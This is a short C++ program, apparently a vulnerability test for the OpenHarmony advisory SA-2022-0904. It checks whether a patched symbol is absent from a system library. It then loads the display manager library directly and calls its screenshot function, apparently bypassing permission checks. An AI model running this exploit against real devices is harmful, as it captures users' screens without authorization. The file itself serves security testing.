1 /*
2 * Copyright (c) 2023 Huawei Device Co., Ltd.
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16 #include <dlfcn.h>
17 #include <memory>
18 #include <stdio.h>
19 #include <unistd.h>
20 namespace Media {
21 class PixelMap;
22 }
23
main()24 int main() {
25 void *handle,*handle2;
26 // 打开共享库libdms.z.so
27 handle2 = dlopen("/system/lib/libdms.z.so", RTLD_LAZY);
28 if (!handle2) {
29 fprintf(stderr, "Error: %s\n", dlerror());
30 return 1;
31 }
32
33 // 获取函数DisplayManagerStub::IsStartByHdcd地址
34 void* IsStartByHdcd= dlsym(handle2, "_ZN4OHOS5Rosen18DisplayManagerStub13IsStartByHdcdEv");
35 if (!IsStartByHdcd) {
36 printf("OpenHarmony-SA-2022-0904: vulnerable!\n");
37 } else {
38 printf("OpenHarmony-SA-2022-0904: not vulnerable!\n");
39 return 1;
40 }
41
42 // 打开共享库libdm.z.so
43 handle = dlopen("/system/lib/libdm.z.so", RTLD_LAZY);
44 if (!handle) {
45 fprintf(stderr, "Error: %s\n", dlerror());
46 return 1;
47 }
48
49 // 获取函数DisplayManager::GetInstance地址
50 typedef void* (*CreateObjFunc)();
51 CreateObjFunc create_obj = reinterpret_cast<CreateObjFunc>(dlsym(handle, "_ZN4OHOS5Rosen14DisplayManager11GetInstanceEv"));
52 if (create_obj == NULL) {
53 fprintf(stderr, "Error: %s\n", dlerror());
54 dlclose(handle);
55 return 1;
56 }
57 // 创建类实例
58 void* obj = create_obj();
59
60 // 获取函数DisplayManager::GetDefaultDisplayId地址
61 typedef uint64_t (*DisplayId)(void*);
62 DisplayId GetDefaultDisplayId = NULL;
63 GetDefaultDisplayId = reinterpret_cast<DisplayId>( dlsym(handle, "_ZN4OHOS5Rosen14DisplayManager19GetDefaultDisplayIdEv"));
64 if (GetDefaultDisplayId == NULL) {
65 fprintf(stderr, "Error: %s\n", dlerror());
66 dlclose(handle);
67 return 1;
68 }
69
70 // 调用函数DisplayManager::GetDefaultDisplayId
71 uint64_t displayId = GetDefaultDisplayId(obj);
72 if (displayId == -1ULL) {
73 printf("GetDefaultDisplayId failed!\n");
74 } else{
75 printf("DisplayId: %llu\n", displayId);
76 }
77
78 // 获取函数DisplayManager::GetScreenshot地址
79 typedef std::shared_ptr<Media::PixelMap> (*GetDisplaySnapshot)(void*,uint64_t);
80 GetDisplaySnapshot GetPixelMap = nullptr;
81 GetPixelMap = reinterpret_cast<GetDisplaySnapshot>(dlsym(handle, "_ZN4OHOS5Rosen14DisplayManager13GetScreenshotEy"));
82 if (GetPixelMap == NULL) {
83 fprintf(stderr, "Error: %s\n", dlerror());
84 dlclose(handle);
85 return 1;
86 }
87 // 调用函数DisplayManager::GetScreenshot
88 void* PixelMap = nullptr;
89 PixelMap = GetPixelMap(obj,displayId).get();
90 if (PixelMap == nullptr) {
91 printf("GetPixelMap failed!\n");
92 } else{
93 printf("PixelMap: %p\n", PixelMap);
94 }
95
96 // 关闭共享库
97
98
99 return 0;
100 }